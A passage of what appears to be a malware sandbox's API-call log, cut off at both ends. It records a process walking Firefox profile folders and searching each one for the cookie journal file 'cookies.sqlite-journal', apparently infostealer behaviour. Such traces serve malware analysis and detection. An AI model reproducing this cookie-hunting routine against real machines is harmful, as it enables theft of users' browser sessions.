returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*" [0251.337] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44067a0 [0251.337] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.337] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.337] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.337] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.337] lstrlenW (lpString="1.6") returned 3 [0251.337] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="1.6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6" [0251.337] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x64 [0251.337] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", lpDst=0x79c8020, nSize=0x64 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned 0x64 [0251.337] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned 99 [0251.337] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.337] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\cookies.sqlite-journal" [0251.337] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\cookies.sqlite-journal", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.338] PathCombineW (in: pszDest=0x79c5700, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*" [0251.338] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x4406e00 [0251.338] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.338] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.338] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.338] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.338] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.338] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.338] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.338] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.338] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.338] FindClose (in: hFindFile=0x44067a0 | out: hFindFile=0x44067a0) returned 1 [0251.338] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.338] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.338] lstrlenW (lpString="gmp-widevinecdm") returned 15 [0251.339] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp-widevinecdm" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm" [0251.339] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0251.339] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", lpDst=0x79c8360, nSize=0x60 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned 0x60 [0251.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned 95 [0251.339] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.339] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\cookies.sqlite-journal" [0251.339] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.339] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*" [0251.339] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44079a0 [0251.339] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.339] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.339] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.339] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.339] lstrlenW (lpString="1.4.8.903") returned 9 [0251.339] PathCombineW (in: pszDest=0x7aaf190, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="1.4.8.903" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903" [0251.339] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x6a [0251.339] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", lpDst=0x79c5700, nSize=0x6a | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned 0x6a [0251.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned 105 [0251.339] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.340] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\cookies.sqlite-journal" [0251.340] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\cookies.sqlite-journal", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.341] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*" [0251.341] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x44064a0 [0251.342] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.342] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.342] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.342] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.342] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.343] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.343] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.343] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.343] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.343] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.343] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.343] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.344] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.344] FindClose (in: hFindFile=0x44079a0 | out: hFindFile=0x44079a0) returned 1 [0251.344] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.344] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.344] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.344] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.344] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.344] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.344] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.344] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.344] lstrlenW (lpString="minidumps") returned 9 [0251.344] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="minidumps" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps" [0251.344] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0251.344] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", lpDst=0x7aaf190, nSize=0x5a | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned 0x5a [0251.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned 89 [0251.344] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.344] PathCombineW (in: pszDest=0x7aaf250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\cookies.sqlite-journal" [0251.344] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.345] PathCombineW (in: pszDest=0x7aaf250, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*" [0251.345] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x4406e00 [0251.345] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.345] FindNextFileW (in: hFindFile=0x4406e00, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.345] FindClose (in: hFindFile=0x4406e00 | out: hFindFile=0x4406e00) returned 1 [0251.345] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.345] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.345] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.345] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.345] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.345] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.345] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.345] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.346] lstrlenW (lpString="saved-telemetry-pings") returned 21 [0251.346] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="saved-telemetry-pings" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings" [0251.346] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x66 [0251.346] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", lpDst=0x7aaf190, nSize=0x66 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned 0x66 [0251.346] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned 101 [0251.346] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.346] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\cookies.sqlite-journal" [0251.346] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.346] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*" [0251.346] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44064a0 [0251.346] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.346] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.346] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.346] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.346] FindNextFileW (in: hFindFile=0x44064a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0 [0251.346] FindClose (in: hFindFile=0x44064a0 | out: hFindFile=0x44064a0) returned 1 [0251.347] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.347] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.347] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.347] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.347] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.347] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.347] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.347] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.347] FindNextFileW (in: hFindFile=0x4406380, lpFindFileData=0x7aaecd0 | out: lpFindFileData=0x7aaecd0) returned 1 [0251.347] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.347] lstrlenW (lpString="sessionstore-backups") returned 20 [0251.347] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="sessionstore-backups" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups" [0251.347] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x65 [0251.347] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", lpDst=0x7aaf190, nSize=0x65 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned 0x65 [0251.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned 100 [0251.347] lstrlenW (lpString="cookies.sqlite-journal") returned 22 [0251.347] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", pszFile="cookies.sqlite-journal" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\cookies.sqlite-journal") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\cookies.sqlite-journal" [0251.347] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\cookies.sqlite-journal", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0xffffffffffffffff [0251.349] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*" [0251.349] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*", lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 0x44079a0 [0251.350] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.350] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.350] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: lpFindFileData=0x7aaef30) returned 1 [0251.350] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.350] FindNextFileW (in: hFindFile=0x44079a0, lpFindFileData=0x7aaef30 | out: 